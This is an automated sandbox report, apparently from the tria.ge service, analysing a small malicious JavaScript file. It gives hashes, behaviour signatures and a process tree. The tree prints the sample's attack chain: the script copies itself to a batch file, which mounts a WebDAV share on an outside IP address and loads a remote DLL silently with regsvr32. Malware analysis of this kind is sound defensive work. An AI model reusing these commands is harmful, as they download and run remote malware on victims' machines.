Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
09/07/2024, 06:17
Static task
static1
Behavioral task
behavioral1
Sample
4860312552222814311.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
4860312552222814311.js
Resource
win10v2004-20240704-en
General
-
Target
4860312552222814311.js
-
Size
5KB
-
MD5
08d79ad15bc6fc6848a70f25a28eb7a0
-
SHA1
fa447ac9b1f8400c0d7fbaba97e5a79405c9426f
-
SHA256
0b83da13ccf53341792db8deec36c9af70154a0caaab8062d64a3fa8c22b9fb6
-
SHA512
8fdf7a8f536d765ce994e6df07b93a9b073c3bdf903e20588608d6a3114286fa185937db9da55b6d1d894ff0f7140549e9443b2c697153fc67bc70ffc9e76066
-
SSDEEP
96:xomU+mw9fwvcm0dy3wLxdy330pd53QpDvhnLekyzLpd++LekuLZHo2p/rk12p/e:RowCMdy34xdy33QSpdqkypd0kezrkKe
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2768 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2560 wrote to memory of 2964 2560 wscript.exe 30 PID 2560 wrote to memory of 2964 2560 wscript.exe 30 PID 2560 wrote to memory of 2964 2560 wscript.exe 30 PID 2964 wrote to memory of 2708 2964 cmd.exe 32 PID 2964 wrote to memory of 2708 2964 cmd.exe 32 PID 2964 wrote to memory of 2708 2964 cmd.exe 32 PID 2964 wrote to memory of 2768 2964 cmd.exe 33 PID 2964 wrote to memory of 2768 2964 cmd.exe 33 PID 2964 wrote to memory of 2768 2964 cmd.exe 33 PID 2964 wrote to memory of 2768 2964 cmd.exe 33 PID 2964 wrote to memory of 2768 2964 cmd.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\4860312552222814311.js1⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\4860312552222814311.js" "C:\Users\Admin\\ovwexs.bat" && "C:\Users\Admin\\ovwexs.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2708
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\68.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2768
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD508d79ad15bc6fc6848a70f25a28eb7a0
SHA1fa447ac9b1f8400c0d7fbaba97e5a79405c9426f
SHA2560b83da13ccf53341792db8deec36c9af70154a0caaab8062d64a3fa8c22b9fb6
SHA5128fdf7a8f536d765ce994e6df07b93a9b073c3bdf903e20588608d6a3114286fa185937db9da55b6d1d894ff0f7140549e9443b2c697153fc67bc70ffc9e76066